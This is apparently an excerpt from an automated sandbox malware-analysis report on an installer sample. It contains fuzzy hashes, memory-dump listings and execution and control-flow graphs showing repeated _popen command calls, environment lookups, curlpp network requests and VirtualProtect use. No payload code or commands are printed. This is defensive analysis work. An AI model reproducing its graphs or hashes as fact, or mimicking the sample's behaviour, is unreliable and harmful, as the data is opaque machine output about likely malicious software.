                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: ErrorLast$Find$CloseFirstStream
                                        • String ID:
                                        • API String ID: 4071060300-0
                                        • Opcode ID: e8f944988b9cb325842934f4d91b529ed218fe4a6d3146ed212e3958b088d38e
                                        • Instruction ID: e0df3afe617d72e22a27f99f1303fe5809e056bbf20cba425ebf9683b02a63d2
                                        • Opcode Fuzzy Hash: e8f944988b9cb325842934f4d91b529ed218fe4a6d3146ed212e3958b088d38e
                                        • Instruction Fuzzy Hash: 05F0F970405605E7EB202F20DC0D79637249B91326F104336E665B72E0C7B89D8ACB5C
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: Unknown error$Unknown warning
                                        • API String ID: 3519838083-4291957651
                                        • Opcode ID: 9dde15fecc67fda54480402201b2371ac7cafa8d569a837fbeba078dd26f7487
                                        • Instruction ID: 8ba015e8ed9162120bf5fc528179e89f7f943c1107267e4dc13521d9f15a9599
                                        • Opcode Fuzzy Hash: 9dde15fecc67fda54480402201b2371ac7cafa8d569a837fbeba078dd26f7487
                                        • Instruction Fuzzy Hash: DB915B71900209DBCB24DFA9C990AEEB7F1FF48304F10856EE45AA7291D734AE49CB58

                                        Execution Graph

                                        Execution Coverage:0.5%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:4.6%
                                        Total number of Nodes:570
                                        Total number of Limit Nodes:26
                                        execution_graph 145421 64945a50 145424 64944e00 145421->145424 145425 64944e33 TlsGetValue 145424->145425 145426 64944e2e 145424->145426 145428 64944e54 145425->145428 145434 64944e4a 145425->145434 145435 64944d80 145426->145435 145450 64944cd0 145428->145450 145431 64944e69 6 API calls 145432 64944f66 abort 145431->145432 145433 64944f20 GetThreadPriority TlsSetValue 145431->145433 145433->145432 145433->145434 145495 649447c0 9 API calls 145435->145495 145437 64944d8f 145464 649433e0 145437->145464 145439 64944d9c 145440 64944de6 145439->145440 145441 64944da6 145439->145441 145496 64944940 TlsAlloc abort 145440->145496 145442 64944dcf 145441->145442 145443 64944dab fprintf 145441->145443 145476 64942eb0 145442->145476 145443->145442 145446 64944deb 145446->145442 145451 649433e0 44 API calls 145450->145451 145452 64944ce0 145451->145452 145453 64944d30 calloc 145452->145453 145454 64944cea 145452->145454 145455 64944d14 145453->145455 145456 64944d4a 145453->145456 145529 649449e0 malloc memmove realloc 145454->145529 145459 64942eb0 6 API calls 145455->145459 145530 649449e0 malloc memmove realloc 145456->145530 145460 64944d20 145459->145460 145460->145431 145460->145434 145461 64944d4f 145461->145455 145463 64944d59 free 145461->145463 145462 64944cf1 145462->145455 145463->145455 145500 64943260 7 API calls 145464->145500 145466 64943310 145467 64943403 145466->145467 145468 64943386 GetCurrentThreadId 145466->145468 145474 6494332d 145466->145474 145467->145439 145469 64943396 145468->145469 145468->145474 145469->145474 145472 6494334f 145472->145439 145474->145472 145475 64943362 GetCurrentThreadId 145474->145475 145497 64942d50 fprintf exit Sleep Sleep Sleep 145474->145497 145498 64941fa0 46 API calls 145474->145498 145499 64943260 7 API calls 145474->145499 145475->145474 145501 64942b90 145476->145501 145478 64942f31 145483 64944870 145478->145483 145479 64942f27 GetCurrentThreadId 145479->145478 145481 64942ec3 145479->145481 145480 64942ee9 ReleaseSemaphore 145480->145481 145482 64942f80 GetCurrentThreadId 145480->145482 145481->145478 145481->145479 145481->145480 145482->145481 145484 649448c1 145483->145484 145485 6494487b 145483->145485 145484->145425 145486 64944360 2 API calls 145485->145486 145487 64944887 145486->145487 145488 649448ec fprintf 145487->145488 145489 649448af 145487->145489 145490 649448b5 145488->145490 145489->145490 145517 64942fa0 145489->145517 145491 649442c0 Sleep 145490->145491 145491->145484 145495->145437 145496->145446 145497->145474 145498->145474 145499->145474 145500->145466 145506 64944360 145501->145506 145507 64944375 145506->145507 145508 64942ba5 145506->145508 145509 649443b2 145507->145509 145510 6494438c 145507->145510 145513 649442c0 145508->145513 145509->145508 145512 649443d2 Sleep 145509->145512 145511 64944390 Sleep 145510->145511 145511->145509 145511->145511 145512->145508 145512->145512 145514 649442d5 145513->145514 145516 64942bc4 145513->145516 145515 649442e8 Sleep 145514->145515 145514->145516 145515->145515 145515->145516 145516->145481 145522 64942c20 145517->145522 145519 64942fb3 145520 64942fee free 145519->145520 145521 64942fc0 FindCloseChangeNotification free 145519->145521 145520->145490 145521->145520 145528 64944230 Sleep 145522->145528 145524 64942c40 145524->145519 145525 649442c0 Sleep 145526 64942c7b 145525->145526 145526->145519 145527 64942c3c 145527->145524 145527->145525 145528->145527 145529->145462 145530->145461 145531 40fa67 145534 40fa51 145531->145534 145532 40fa77 145533 499659 abort 145535 49965e abort 145533->145535 145534->145532 145534->145533 145536 499663 abort 145535->145536 145537 499668 abort 145536->145537 145538 499670 abort 145537->145538 145539 499675 abort 145538->145539 145540 499680 145539->145540 145540->145540 145541 402e77 145544 402cf3 145541->145544 145545 402e44 145544->145545 145546 402d04 145544->145546 145546->145545 145574 48d8e0 157 API calls 145546->145574 145548 402d1b 145575 4014c0 _onexit 145548->145575 145550 402d27 145576 485fa0 145550->145576 145552 402d49 145581 4014c0 _onexit 145552->145581 145554 402d62 145582 494fb0 100 API calls 145554->145582 145556 402d7f 145583 4014c0 _onexit 145556->145583 145558 402d8b 145584 494fb0 100 API calls 145558->145584 145560 402da8 145585 4014c0 _onexit 145560->145585 145562 402db4 145586 494fb0 100 API calls 145562->145586 145564 402dd1 145587 4014c0 _onexit 145564->145587 145566 402ddd 145567 485fa0 97 API calls 145566->145567 145568 402dff 145567->145568 145588 4014c0 _onexit 145568->145588 145570 402e18 _ZN6curlpp7CleanupC1Ev 145589 4014c0 _onexit 145570->145589 145572 402e2e _ZN6curlpp4EasyC1Ev 145590 4014c0 _onexit 145572->145590 145574->145548 145575->145550 145577 485fb9 strlen 145576->145577 145578 485fc3 145576->145578 145577->145578 145591 484010 145578->145591 145580 485fd6 145580->145552 145581->145554 145582->145556 145583->145558 145584->145560 145585->145562 145586->145564 145587->145566 145588->145570 145589->145572 145590->145545 145592 484024 145591->145592 145594 48402c 145591->145594 145593 4840bc 145592->145593 145592->145594 145602 491fc0 95 API calls 145593->145602 145599 484037 145594->145599 145601 485c50 95 API calls 145594->145601 145597 484064 145597->145580 145598 484096 memcpy 145598->145580 145599->145580 145599->145597 145599->145598 145601->145599 145603 6494819c 145604 649481a0 145603->145604 145605 649481a5 VirtualProtect memcpy 145604->145605 145606 6494816e memcpy 145604->145606 145607 64948186 145605->145607 145608 649481f0 145605->145608 145606->145607 145608->145607 145609 649481f5 VirtualProtect 145608->145609 145610 649412ec 145611 649412f0 145610->145611 145630 649482d0 145611->145630 145613 649412f5 145614 649412fd 145613->145614 145617 6494132e 145613->145617 145648 64941040 7 API calls 145614->145648 145616 649412ba 145619 649412cb 145616->145619 145624 64941396 145616->145624 145617->145616 145625 64941354 145617->145625 145618 64941318 145618->145619 145620 6494130d 145620->145618 145621 64941320 145620->145621 145622 649413fd 145620->145622 145621->145624 145649 649485b0 _lock __dllonexit _unlock _onexit 145621->145649 145622->145618 145652 64941040 7 API calls 145622->145652 145624->145616 145651 64941040 7 API calls 145624->145651 145650 64941040 7 API calls 145625->145650 145626 649413c7 145631 649482d9 145630->145631 145633 649482e0 145630->145633 145631->145613 145632 649483d1 145632->145613 145633->145632 145636 649483d9 145633->145636 145642 6494836b 145633->145642 145634 64948567 145637 64948030 26 API calls 145634->145637 145636->145632 145638 64948412 145636->145638 145695 64948080 145636->145695 145639 64948577 145637->145639 145638->145632 145641 6494843f VirtualQuery 145638->145641 145639->145613 145640 64948080 26 API calls 145640->145642 145644 64948544 145641->145644 145645 64948462 VirtualProtect 145641->145645 145642->145632 145642->145634 145642->145638 145642->145640 145643 649483ba 145642->145643 145653 64948030 145643->145653 145647 64948030 26 API calls 145644->145647 145645->145638 145647->145634 145648->145620 145649->145617 145650->145624 145651->145626 145652->145618 145733 64949480 145653->145733 145658 64948142 VirtualQuery 145661 64948165 145658->145661 145662 649482b7 145658->145662 145660 64948080 145660->145658 145664 649482a7 145660->145664 145670 649480f8 VirtualQuery 145660->145670 145678 6494827b 145660->145678 145665 6494816e memcpy 145661->145665 145666 649481a5 VirtualProtect memcpy 145661->145666 145663 64948030 15 API calls 145662->145663 145680 649482cf 145663->145680 145667 64948030 15 API calls 145664->145667 145668 64948186 145665->145668 145666->145668 145669 649481f0 145666->145669 145667->145662 145668->145632 145669->145668 145671 649481f5 VirtualProtect 145669->145671 145672 64948135 145670->145672 145673 64948287 145670->145673 145671->145632 145672->145658 145675 64948229 VirtualProtect 145672->145675 145673->145664 145674 64948030 15 API calls 145673->145674 145674->145664 145675->145658 145676 64948265 GetLastError 145675->145676 145677 64948030 15 API calls 145676->145677 145677->145678 145678->145632 145679 649482d9 145679->145632 145680->145679 145683 649483d9 145680->145683 145688 6494836b 145680->145688 145681 64948567 145684 64948030 15 API calls 145681->145684 145682 64948080 15 API calls 145682->145683 145683->145679 145683->145682 145685 64948412 145683->145685 145694 64948577 145684->145694 145685->145679 145687 6494843f VirtualQuery 145685->145687 145686 64948080 15 API calls 145686->145688 145690 64948544 145687->145690 145691 64948462 VirtualProtect 145687->145691 145688->145679 145688->145681 145688->145685 145688->145686 145689 649483ba 145688->145689 145692 64948030 15 API calls 145689->145692 145693 64948030 15 API calls 145690->145693 145691->145685 145692->145679 145693->145681 145694->145632 145696 6494827b 145695->145696 145703 6494809f 145695->145703 145696->145636 145697 64948142 VirtualQuery 145699 64948165 145697->145699 145700 649482b7 145697->145700 145704 6494816e memcpy 145699->145704 145705 649481a5 VirtualProtect memcpy 145699->145705 145701 64948030 16 API calls 145700->145701 145718 649482cf 145701->145718 145702 649482a7 145706 64948030 16 API calls 145702->145706 145703->145697 145703->145702 145709 649480f8 VirtualQuery 145703->145709 145707 64948186 145704->145707 145705->145707 145708 649481f0 145705->145708 145706->145700 145707->145636 145708->145707 145710 649481f5 VirtualProtect 145708->145710 145711 64948135 145709->145711 145712 64948287 145709->145712 145710->145636 145711->145697 145714 64948229 VirtualProtect 145711->145714 145712->145702 145713 64948030 16 API calls 145712->145713 145713->145702 145714->145697 145715 64948265 GetLastError 145714->145715 145716 64948030 16 API calls 145715->145716 145716->145696 145717 649482d9 145717->145636 145718->145717 145721 649483d9 145718->145721 145725 6494836b 145718->145725 145719 64948567 145722 64948030 16 API calls 145719->145722 145720 64948080 16 API calls 145720->145721 145721->145717 145721->145720 145723 64948412 145721->145723 145732 64948577 145722->145732 145723->145717 145724 6494843f VirtualQuery 145723->145724 145728 64948544 145724->145728 145729 64948462 VirtualProtect 145724->145729 145725->145717 145725->145719 145725->145723 145726 649483ba 145725->145726 145727 64948080 16 API calls 145725->145727 145730 64948030 16 API calls 145726->145730 145727->145725 145731 64948030 16 API calls 145728->145731 145729->145723 145730->145717 145731->145719 145732->145636 145739 6494ab50 _errno getenv 145733->145739 145736 649494c0 145737 6494ab50 5 API calls 145736->145737 145738 6494806c abort 145737->145738 145738->145660 145740 6494abf2 145739->145740 145741 6494abe2 145739->145741 145747 6494e080 GetModuleHandleW GetProcAddress 145740->145747 145741->145740 145746 6494abff 145741->145746 145744 64948050 145744->145736 145745 64949600 fputc 145745->145746 145746->145744 145746->145745 145748 4013c9 145749 4013d0 145748->145749 145750 4013e3 _amsg_exit 145749->145750 145751 4011c5 145749->145751 145754 4013fd _initterm 145750->145754 145758 4011ea 145750->145758 145752 401441 _initterm 145751->145752 145753 4011d2 145751->145753 145755 401464 145752->145755 145753->145754 145753->145758 145754->145758 145757 40146c exit 145755->145757 145996 40ca60 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 145757->145996 145776 40cef0 145758->145776 145761 40123d 145763 401242 __p__acmdln 145761->145763 145762 401492 145764 401259 malloc 145763->145764 145764->145755 145766 4012f8 145764->145766 145767 401310 strlen malloc memcpy 145766->145767 145767->145767 145768 401346 145767->145768 145805 40ca20 145768->145805 145770 40135f 145810 40165f 145770->145810 145772 40138b 145772->145757 145773 40139e 145772->145773 145774 4013b2 145773->145774 145775 4013a8 _cexit 145773->145775 145775->145774 145799 40cf10 145776->145799 145803 40121c SetUnhandledExceptionFilter 145776->145803 145777 40cf6f 145781 40cf7c 145777->145781 145777->145803 145778 40d160 145999 4995d0 6 API calls 145778->145999 145782 40cfc8 145781->145782 145997 40cda0 18 API calls 145781->145997 145802 40cfcb 145782->145802 145788 40d054 145788->145799 145800 40cda0 18 API calls 145788->145800 145998 4995d0 6 API calls 145788->145998 145799->145777 145799->145778 145799->145788 145799->145802 145799->145803 145800->145788 145801 40cff4 VirtualProtect 145801->145802 145802->145801 145802->145803 145803->145761 145806 40ca29 145805->145806 145807 40c9d0 145805->145807 145806->145770 146000 4014c0 _onexit 145807->146000 145809 40c9fb 145809->145770 145811 40ca20 _onexit 145810->145811 145812 40167a FindWindowA 145811->145812 145813 4016a5 getenv 145812->145813 145814 4016c4 145813->145814 145815 485fa0 97 API calls 145814->145815 145816 4016e2 145815->145816 145817 485fa0 97 API calls 145816->145817 145818 40171d 145817->145818 145819 485fa0 97 API calls 145818->145819 145820 401758 145819->145820 145821 485fa0 97 API calls 145820->145821 145822 401793 145821->145822 145823 485fa0 97 API calls 145822->145823 145824 4017ce 145823->145824 145825 485fa0 97 API calls 145824->145825 145826 401809 145825->145826 145827 485fa0 97 API calls 145826->145827 145828 401844 145827->145828 145829 485fa0 97 API calls 145828->145829 145830 40187f 145829->145830 145831 485fa0 97 API calls 145830->145831 145832 4018ba 145831->145832 145833 485fa0 97 API calls 145832->145833 145834 4018f5 145833->145834 145835 485fa0 97 API calls 145834->145835 145836 401930 145835->145836 145837 485fa0 97 API calls 145836->145837 145838 40196b 145837->145838 145839 485fa0 97 API calls 145838->145839 145840 4019a6 145839->145840 145841 485fa0 97 API calls 145840->145841 145842 4019e1 145841->145842 145843 485fa0 97 API calls 145842->145843 145844 401a1c 145843->145844 145845 485fa0 97 API calls 145844->145845 145846 401a57 145845->145846 145847 485fa0 97 API calls 145846->145847 145848 401a92 145847->145848 145849 485fa0 97 API calls 145848->145849 145850 401acd 145849->145850 145851 485fa0 97 API calls 145850->145851 145852 401b08 145851->145852 145853 485fa0 97 API calls 145852->145853 145854 401b43 145853->145854 145855 485fa0 97 API calls 145854->145855 145856 401b7e 145855->145856 145857 485fa0 97 API calls 145856->145857 145858 401bb9 145857->145858 145859 485fa0 97 API calls 145858->145859 145860 401bf3 145859->145860 146001 494ec0 145860->146001 145862 401c16 146004 494de0 145862->146004 145864 401c36 145865 401c6a _popen Sleep 145864->145865 146007 494ff8 145865->146007 145867 401cb2 145868 401cbf _popen 145867->145868 145869 401ce1 145868->145869 146012 4015e8 145869->146012 145872 401d38 145874 494ff8 99 API calls 145872->145874 145876 401d6a 145874->145876 145875 401d25 146018 486680 96 API calls 145875->146018 145878 401d77 _popen 145876->145878 145879 401d99 145878->145879 145880 4015e8 161 API calls 145879->145880 145881 401dae 145880->145881 145882 401df0 145881->145882 146019 494fb0 100 API calls 145881->146019 145884 494ff8 99 API calls 145882->145884 145885 401e22 145884->145885 145888 401e2f _popen 145885->145888 145886 401ddd 146020 486680 96 API calls 145886->146020 145889 401e51 145888->145889 145890 4015e8 161 API calls 145889->145890 145891 401e66 145890->145891 145892 401ea8 145891->145892 146021 494fb0 100 API calls 145891->146021 145893 494ff8 99 API calls 145892->145893 145895 401eda 145893->145895 145898 401ee7 _popen 145895->145898 145896 401e95 146022 486680 96 API calls 145896->146022 145899 401f09 145898->145899 145900 4015e8 161 API calls 145899->145900 145901 401f1e 145900->145901 145902 401f60 145901->145902 146023 494fb0 100 API calls 145901->146023 145903 494ff8 99 API calls 145902->145903 145905 401f92 145903->145905 145908 401f9f _popen 145905->145908 145906 401f4d 146024 486680 96 API calls 145906->146024 145909 401fc1 145908->145909 145910 4015e8 161 API calls 145909->145910 145911 401fd6 145910->145911 145912 402018 145911->145912 146025 494fb0 100 API calls 145911->146025 145913 494ff8 99 API calls 145912->145913 145915 40204a 145913->145915 145918 402057 _popen 145915->145918 145916 402005 146026 486680 96 API calls 145916->146026 145919 402079 145918->145919 145920 4015e8 161 API calls 145919->145920 145921 40208e 145920->145921 145922 4020d0 145921->145922 146027 494fb0 100 API calls 145921->146027 145923 494ff8 99 API calls 145922->145923 145925 402102 145923->145925 145928 40210f _popen 145925->145928 145926 4020bd 146028 486680 96 API calls 145926->146028 145929 402131 145928->145929 145930 4015e8 161 API calls 145929->145930 145931 402146 145930->145931 145932 402188 145931->145932 146029 494fb0 100 API calls 145931->146029 145933 494ff8 99 API calls 145932->145933 145935 4021ba 145933->145935 145938 4021c7 _popen 145935->145938 145936 402175 146030 486680 96 API calls 145936->146030 145939 4021e9 145938->145939 145940 4015e8 161 API calls 145939->145940 145941 4021fe 145940->145941 145942 402240 145941->145942 146031 494fb0 100 API calls 145941->146031 145943 494ff8 99 API calls 145942->145943 145946 402272 145943->145946 145945 40222d 146032 486680 96 API calls 145945->146032 145948 40227f _popen 145946->145948 145949 4022a1 145948->145949 145950 4015e8 161 API calls 145949->145950 145951 4022b6 145950->145951 145952 4022f8 145951->145952 146033 494fb0 100 API calls 145951->146033 145954 494ff8 99 API calls 145952->145954 145956 40232a 145954->145956 145955 4022e5 146034 486680 96 API calls 145955->146034 145958 402337 _popen 145956->145958 145959 402359 145958->145959 145960 4015e8 161 API calls 145959->145960 145961 40236e 145960->145961 145962 4023b0 145961->145962 146035 494fb0 100 API calls 145961->146035 145964 494ff8 99 API calls 145962->145964 145966 4023e2 145964->145966 145965 40239d 146036 486680 96 API calls 145965->146036 145968 4023ef _popen 145966->145968 145969 402411 145968->145969 145970 4015e8 161 API calls 145969->145970 145971 402426 145970->145971 145972 402468 145971->145972 146037 494fb0 100 API calls 145971->146037 146039 48ccc0 95 API calls 145972->146039 145975 402455 146038 486680 96 API calls 145975->146038 145976 402490 145978 494ff8 99 API calls 145976->145978 145979 4024ae 145978->145979 145980 494de0 100 API calls 145979->145980 145981 4024ce 145980->145981 146040 494e14 129 API calls 145981->146040 145983 4024f0 145984 402517 _ZN6curlpp7CleanupC1Ev 145983->145984 145985 40252d 145984->145985 145986 40254f 145984->145986 146041 41d634 98 API calls 145985->146041 146042 494fb0 100 API calls 145986->146042 145989 402540 _ZN6curlpp4Easy7performEv 145991 402591 _ZN6curlpp7CleanupD1Ev 145989->145991 145990 40256a 146043 41d634 98 API calls 145990->146043 145995 4025b0 145991->145995 145993 40257a 145994 402587 _ZN6curlpp4Easy7performEv 145993->145994 145994->145991 145995->145772 145996->145762 145997->145781 146000->145809 146044 484d20 strlen 146001->146044 146003 494ede 146003->145862 146059 484870 strlen 146004->146059 146006 494df6 146006->145864 146077 486030 146007->146077 146091 475600 146012->146091 146014 40160d 146107 475d30 146014->146107 146016 40163d 146016->145872 146017 494fb0 100 API calls 146016->146017 146017->145875 146018->145872 146019->145886 146020->145882 146021->145896 146022->145892 146023->145906 146024->145902 146025->145916 146026->145912 146027->145926 146028->145922 146029->145936 146030->145932 146031->145945 146032->145942 146033->145955 146034->145952 146035->145965 146036->145962 146037->145975 146038->145972 146039->145976 146040->145983 146041->145989 146042->145990 146043->145993 146045 484d3f 146044->146045 146046 484d65 146044->146046 146057 483ad0 106 API calls 146045->146057 146058 4926a0 115 API calls 146046->146058 146049 484d59 146049->146003 146057->146049 146060 4848a8 146059->146060 146061 48488f 146059->146061 146075 4920c0 95 API calls 146060->146075 146068 485b00 146061->146068 146069 485b1b 146068->146069 146070 485b22 146069->146070 146071 485b55 146069->146071 146072 48489d 146070->146072 146074 485b2d memcpy 146070->146074 146076 485cd0 98 API calls 146071->146076 146072->146006 146074->146072 146076->146072 146083 4840fc 146077->146083 146079 486055 146080 4848f0 146079->146080 146081 485b00 99 API calls 146080->146081 146082 484908 146081->146082 146082->145867 146084 484111 146083->146084 146087 484139 146084->146087 146089 491fc0 95 API calls 146084->146089 146086 48416e 146086->146079 146087->146086 146090 485c50 95 API calls 146087->146090 146090->146086 146092 475615 146091->146092 146110 48f930 157 API calls 146092->146110 146094 475672 146111 46c010 157 API calls 146094->146111 146096 47568c 146112 48f930 157 API calls 146096->146112 146098 475696 146113 46aa10 92 API calls 146098->146113 146100 4756b0 146101 4756e0 146100->146101 146102 4756be 146100->146102 146115 48fa90 121 API calls 146101->146115 146114 48fa90 121 API calls 146102->146114 146105 4756ca 146105->146014 146106 4756ee 146106->146014 146116 46ad00 92 API calls 146107->146116 146109 475d52 146110->146094 146111->146096 146112->146098 146113->146100 146114->146105 146115->146106 146116->146109 146117 41d46c 146118 41d453 pthread_mutex_unlock 146117->146118 146120 41d4a1 146118->146120 146121 41d463 146118->146121 146135 496bf0 malloc 146120->146135 146125 41d4cb 146126 41f220 88 API calls 146125->146126 146127 41d4d0 146126->146127 146128 497b71 146127->146128 146129 496d80 88 API calls 146127->146129 146130 40fe40 54 API calls 146128->146130 146129->146128 146131 497b76 pthread_mutex_init malloc 146130->146131 146132 497bb6 146131->146132 146133 4014c0 _onexit 146132->146133 146134 497bd4 146133->146134 146136 41d4ad 146135->146136 146137 496c32 146135->146137 146142 4972e0 146136->146142 146151 41d400 88 API calls 146137->146151 146139 496c39 146139->146136 146152 4936f0 88 API calls 146139->146152 146141 496c44 146153 496f30 14 API calls 146142->146153 146144 4972e9 146154 40fc40 49 API calls 146144->146154 146146 49733c 146155 496cb0 88 API calls 146146->146155 146148 497344 146156 4936f0 88 API calls 146148->146156 146150 497349 146151->146139 146152->146141 146153->146144 146154->146146 146155->146148 146156->146150

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 413 4995d0-49967e call 41bfa0 fwrite call 41bfa0 vfprintf abort * 4 421 499680 413->421 421->421
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort$fwritevfprintf
                                        • String ID:
                                        • API String ID: 2868300786-0
                                        • Opcode ID: af5f97742a825dff3c80760dc8132a253028146a0bc605ebe041e8cbfa5d0819
                                        • Instruction ID: e41cab24bbbf80130bade02cb0747bd2eff16b06b465fa276b94caa12873cc4b
                                        • Opcode Fuzzy Hash: af5f97742a825dff3c80760dc8132a253028146a0bc605ebe041e8cbfa5d0819
                                        • Instruction Fuzzy Hash: 74F0D0719493048AC300BF66C5862AEFAF0EF8A348F40DC1EF0C857142C77C80818B9B

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 422 40115c-40117a 423 401430-401439 GetStartupInfoA 422->423 424 401180-401191 422->424 426 401441-40145a _initterm 423->426 425 4011a7-4011b3 424->425 427 401193-401195 425->427 428 4011b5-4011bf 425->428 433 401464 426->433 429 4013d0-4013dd 427->429 430 40119b-4011a4 Sleep 427->430 431 4013e3-4013f7 _amsg_exit 428->431 432 4011c5-4011cc 428->432 429->431 429->432 430->425 435 4011ea-4011ec 431->435 436 4013fd-40141d _initterm 431->436 432->426 434 4011d2-4011e4 432->434 439 40146c-401492 exit call 40ca60 433->439 434->435 434->436 437 4011f2-4011f9 435->437 438 401423-401429 435->438 436->437 436->438 440 401217-401257 call 40cef0 SetUnhandledExceptionFilter call 41bfc0 call 40cd70 __p__acmdln 437->440 441 4011fb-401214 437->441 438->437 451 401271-401277 440->451 452 401259 440->452 441->440 454 401260-401262 451->454 455 401279-401284 451->455 453 4012b4-4012bc 452->453 458 4012d2-4012f2 malloc 453->458 459 4012be-4012c7 453->459 456 401290-401292 454->456 457 401264-401267 454->457 460 40126e 455->460 464 401294 456->464 465 4012a5-4012ad 456->465 457->456 461 401269 457->461 458->433 466 4012f8-401309 458->466 462 4013c0-4013c4 459->462 463 4012cd 459->463 460->451 461->460 462->463 463->458 467 4012af 464->467 465->467 469 4012a0-4012a3 465->469 468 401310-401344 strlen malloc memcpy 466->468 467->453 468->468 470 401346-401398 call 40ca20 call 40165f 468->470 469->465 469->467 470->439 475 40139e-4013a6 470->475 476 4013b2-4013bd 475->476 477 4013a8-4013ad _cexit 475->477 477->476
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
                                        • String ID:
                                        • API String ID: 1672962128-0
                                        • Opcode ID: 53538b4533ba164ef90a8db0a9fc0ea9866a4c7ba18965aafaba27d860817bfc
                                        • Instruction ID: 7f0f39de961eb26063c5e90d7adcfb4269c3a08c1b042310f1fe7f2674e2017b
                                        • Opcode Fuzzy Hash: 53538b4533ba164ef90a8db0a9fc0ea9866a4c7ba18965aafaba27d860817bfc
                                        • Instruction Fuzzy Hash: 2C818D719083448FDB10DF69D9C07AA7BE1FB45324F00847EE944AB3A2D7799C45CB8A

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 586 4013c9-4013dd 588 4013e3-4013f7 _amsg_exit 586->588 589 4011c5-4011cc 586->589 592 4011ea-4011ec 588->592 593 4013fd-40141d _initterm 588->593 590 401441-40145a _initterm 589->590 591 4011d2-4011e4 589->591 596 401464 590->596 591->592 591->593 594 4011f2-4011f9 592->594 595 401423-401429 592->595 593->594 593->595 597 401217-401257 call 40cef0 SetUnhandledExceptionFilter call 41bfc0 call 40cd70 __p__acmdln 594->597 598 4011fb-401214 594->598 595->594 600 40146c-401492 exit call 40ca60 596->600 609 401271-401277 597->609 610 401259 597->610 598->597 612 401260-401262 609->612 613 401279-401284 609->613 611 4012b4-4012bc 610->611 616 4012d2-4012f2 malloc 611->616 617 4012be-4012c7 611->617 614 401290-401292 612->614 615 401264-401267 612->615 618 40126e 613->618 622 401294 614->622 623 4012a5-4012ad 614->623 615->614 619 401269 615->619 616->596 624 4012f8-401309 616->624 620 4013c0-4013c4 617->620 621 4012cd 617->621 618->609 619->618 620->621 621->616 625 4012af 622->625 623->625 627 4012a0-4012a3 623->627 626 401310-401344 strlen malloc memcpy 624->626 625->611 626->626 628 401346-401386 call 40ca20 call 40165f 626->628 627->623 627->625 632 40138b-401398 628->632 632->600 633 40139e-4013a6 632->633 634 4013b2-4013bd 633->634 635 4013a8-4013ad _cexit 633->635 635->634
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
